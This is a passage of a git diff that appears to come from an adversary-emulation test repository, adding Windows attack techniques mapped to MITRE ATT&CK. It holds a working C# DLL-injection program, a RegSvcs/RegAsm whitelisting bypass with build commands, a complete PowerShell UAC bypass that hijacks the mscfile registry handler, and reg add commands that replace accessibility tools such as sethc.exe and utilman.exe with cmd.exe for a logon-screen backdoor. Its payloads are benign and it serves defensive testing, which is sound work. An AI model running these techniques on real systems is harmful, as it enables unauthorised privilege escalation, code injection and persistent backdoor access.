+// Sample DLL MessageBox Source From Here: https://github.com/enigma0x3/MessageBox . Thanks Matt ;-) + + +public class BasicInject +{ + [DllImport("kernel32.dll")] + public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); + + [DllImport("kernel32.dll", CharSet = CharSet.Auto)] + public static extern IntPtr GetModuleHandle(string lpModuleName); + + [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] + static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] + static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, + uint dwSize, uint flAllocationType, uint flProtect); + + [DllImport("kernel32.dll", SetLastError = true)] + static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); + + [DllImport("kernel32.dll")] + static extern IntPtr CreateRemoteThread(IntPtr hProcess, + IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + + // privileges + const int PROCESS_CREATE_THREAD = 0x0002; + const int PROCESS_QUERY_INFORMATION = 0x0400; + const int PROCESS_VM_OPERATION = 0x0008; + const int PROCESS_VM_WRITE = 0x0020; + const int PROCESS_VM_READ = 0x0010; + + // used for memory allocation + const uint MEM_COMMIT = 0x00001000; + const uint MEM_RESERVE = 0x00002000; + const uint PAGE_READWRITE = 4; + + public static int Main() + { + // the target process - I'm using a dummy process for this + // if you don't have one, open Task Manager and choose wisely + Process.Start("notepad"); + + Process targetProcess = Process.GetProcessesByName("notepad")[0]; + + // geting the handle of the process - with required privileges + IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); + + // searching for the address of LoadLibraryA and storing it in a pointer + IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); + + // name of the dll we want to inject + string dllName = ""; + if(IntPtr.Size == 8) + { + dllName = "MessageBox64.dll"; + } + else + { + dllName = "MessageBox32.dll"; + } + // alocating some memory on the target process - enough to store the name of the dll + // and storing its address in a pointer + IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + + // writing the name of the dll there + UIntPtr bytesWritten; + WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); + + // creating a thread that will call LoadLibraryA with allocMemAddress as argument + CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); + + return 0; + } +} diff --git a/Windows/Payloads/DllInject/MessageBox32.dll b/Windows/Payloads/DllInject/MessageBox32.dll new file mode 100755 index 0000000000000000000000000000000000000000..03031ed8db19d703fb91d49c43aec7802f5673ef GIT binary patch literal 8704 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 E3qPc1P5=M^ literal 0 HcmV?d00001 diff --git a/Windows/Payloads/DllInject/MessageBox64.dll b/Windows/Payloads/DllInject/MessageBox64.dll new file mode 100755 index 0000000000000000000000000000000000000000..5d2693a673ed44b5fc5bdf1af7c74cbb833d5a77 GIT binary patch literal 10752 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 + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Windows/Payloads/RegSvcsRegAsmBypass.cs b/Windows/Payloads/RegSvcsRegAsmBypass.cs new file mode 100644 index 00000000..8d033f6d --- /dev/null +++ b/Windows/Payloads/RegSvcsRegAsmBypass.cs @@ -0,0 +1,50 @@ +using System; +using System.EnterpriseServices; +using System.Runtime.InteropServices; + +/* +Author: Casey Smith, Twitter: @subTee +License: BSD 3-Clause +Create Your Strong Name Key -> key.snk + +From PowerShell.exe + +Step One: Creates a Strong Name Key. +$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' +$Content = [System.Convert]::FromBase64String($key) +Set-Content key.snk -Value $Content -Encoding Byte + +C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk RegSvcsRegaAsmBypass.cs +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll + +[OR] + +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll +//Executes UnRegisterClass If you don't have permissions +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll +C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll + +//This calls the UnregisterClass Method +*/ +namespace regsvcser +{ + + public class Bypass : ServicedComponent + { + public Bypass() { Console.WriteLine("I am a basic COM Object"); } + + [ComRegisterFunction] //This executes if registration is successful + public static void RegisterClass ( string key ) + { + Console.WriteLine("I shouldn't really execute"); + } + + [ComUnregisterFunction] //This executes if registration fails + public static void UnRegisterClass ( string key ) + { + Console.WriteLine("I shouldn't really execute either."); + + } + } + +} diff --git a/Windows/Payloads/RegSvr32.sct b/Windows/Payloads/RegSvr32.sct new file mode 100644 index 00000000..697938ed --- /dev/null +++ b/Windows/Payloads/RegSvr32.sct @@ -0,0 +1,23 @@ + + + + + + + + + + + + + + diff --git a/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 b/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 new file mode 100644 index 00000000..4c119b03 --- /dev/null +++ b/Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 @@ -0,0 +1,92 @@ +function Invoke-EventVwrBypass { +<# +.SYNOPSIS + +Bypasses UAC by performing an image hijack on the .msc file extension +Expected to work on Win7, 8.1 and Win10 + +Only tested on Windows 7 and Windows 10 + +Author: Matt Nelson (@enigma0x3) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +.PARAMETER Command + + Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc " + +.EXAMPLE + +Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA=" + +This will write out "Is Elevated: True" to C:\UACBypassTest. + +#> + + [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] + Param ( + [Parameter(Mandatory = $True)] + [ValidateNotNullOrEmpty()] + [String] + $Command, + + [Switch] + $Force + ) + $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin + $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop + + if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){ + "UAC is set to 'Always Notify'. This module does not bypass this setting." + exit + } + else{ + #Begin Execution + $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command" + $Command = $pshome + '\' + $Command + #Add in the new registry entries to hijack the msc file + if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ + New-Item $mscCommandPath -Force | + New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null + }else{ + Write-Warning "Key already exists, consider using -Force" + exit + } + + if (Test-Path $mscCommandPath) { + Write-Verbose "Created registry entries to hijack the msc extension" + }else{ + Write-Warning "Failed to create registry key, exiting" + exit + } + + $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe' + #Start Event Viewer + if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) { + $Process = Start-Process -FilePath $EventvwrPath -PassThru + Write-Verbose "Started eventvwr.exe" + } + + #Sleep 5 seconds + Write-Verbose "Sleeping 5 seconds to trigger payload" + if (-not $PSBoundParameters['WhatIf']) { + Start-Sleep -Seconds 5 + } + + $mscfilePath = "HKCU:\Software\Classes\mscfile" + + if (Test-Path $mscfilePath) { + #Remove the registry entry + Remove-Item $mscfilePath -Recurse -Force + Write-Verbose "Removed registry entries" + } + + if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){ + Stop-Process -Id $Process.Id + Write-Verbose "Killed running eventvwr process" + } + } +} diff --git a/Windows/Persistence/Accessibility_Features.md b/Windows/Persistence/Accessibility_Features.md new file mode 100644 index 00000000..42625417 --- /dev/null +++ b/Windows/Persistence/Accessibility_Features.md @@ -0,0 +1,31 @@ +## Accessibility Features + +MITRE ATT&CK Technique: [T1015](https://attack.mitre.org/wiki/Technique/T1015) + +### osk.exe swap + + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f + +### sethc.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### utilman.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### magnify.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### narrator.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### DisplaySwitch.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f + +### AtBroker.exe swap + + REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AtBroker.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f diff --git a/Windows/Persistence/AppInit_DLLs.md b/Windows/Persistence/AppInit_DLLs.md new file mode 100644 index 00000000..5b834928 --- /dev/null +++ b/Windows/Persistence/AppInit_DLLs.md @@ -0,0 +1,24 @@ +## AppInit DLLs + +MITRE ATT&CK Technique: [T1103](https://attack.mitre.org/wiki/Technique/T1103) + +#### AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system: + HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows + +#### LoadAppInit_DLLs (REG_DWORD) Globally enables or disables AppInit_DLLs. + + 0x0 – AppInit_DLLs are disabled. + + 0x1 – AppInit_DLLs are enabled. + +#### AppInit_DLLs (REG_SZ) Space or comma delimited list of DLLs to load. The complete path to the DLL should be specified using Short Names. + + C:\ PROGRA~1\WID288~1\MICROS~1.DLL + +##### RequireSignedAppInit_DLLs (REG_DWORD) Only load code-signed DLLs. 0x0 – Load any DLLs. + + 0x1 – Load only code-signed DLLs. + +## Test Script + +[AppInitInject.reg](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AppInitInject.reg) diff --git a/Windows/Persistence/Application_Shimming.md b/Windows/Persistence/Application_Shimming.md new file mode 100644 index 00000000..a63d49db --- /dev/null +++ b/Windows/Persistence/Application_Shimming.md @@ -0,0 +1,17 @@ +## Application Shimming + +MITRE ATT&CK Technique: [T1138](https://attack.mitre.org/wiki/Technique/T1138) + +#### Deploying a custom shim database to users requires the following actions: + +##### 1.) Placing the custom shim database (*.sdb file) in a location to which the user’s computer has access (either locally or on the network) + +##### 2.) Possibly calling the sdbinst.exe command-line utility to install the custom shim database locally. + +##### 3.) Registry Modification - This is completed either manually or by an installation tool. + + HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom + + HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB + +#### Detecting the shim execution is difficult. We suggest detection of Shim Installation. diff --git a/Windows/Persistence/Authentication_Package.md b/Windows/Persistence/Authentication_Package.md new file mode 100644 index 00000000..759b89b0 --- /dev/null +++ b/Windows/Persistence/Authentication_Package.md @@ -0,0 +1,5 @@ +## Authentication Package + +MITRE ATT&CK Technique: [T1131](https://attack.mitre.org/wiki/Technique/T1131) + + HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ diff --git a/Windows/Persistence/Change_Default_File_Association.md b/Windows/Persistence/Change_Default_File_Association.md new file mode 100644 index 00000000..4eeaca66 --- /dev/null +++ 